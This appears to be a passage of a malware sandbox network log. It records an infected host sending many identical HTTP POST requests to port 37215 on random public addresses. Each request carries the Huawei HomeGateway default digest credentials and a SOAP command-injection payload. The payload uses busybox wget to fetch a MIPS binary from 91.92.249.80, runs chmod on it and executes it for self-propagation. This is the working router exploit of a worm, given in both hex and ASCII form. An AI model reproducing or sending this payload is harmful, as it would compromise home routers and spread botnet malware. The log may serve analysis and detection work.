                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1644192.168.2.234632641.96.75.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511209965 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1645192.168.2.2345854210.232.178.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511212111 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1646192.168.2.2337216157.227.115.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511229038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1647192.168.2.2348412157.192.111.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511286974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1648192.168.2.235485288.29.90.21537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511296034 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1649192.168.2.2352888157.169.211.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511307955 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1650192.168.2.235994841.76.175.16037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511363983 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1651192.168.2.233926041.28.85.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511379957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1652192.168.2.2344758105.79.204.13337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511387110 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1653192.168.2.2360138220.151.204.11837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.511626005 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
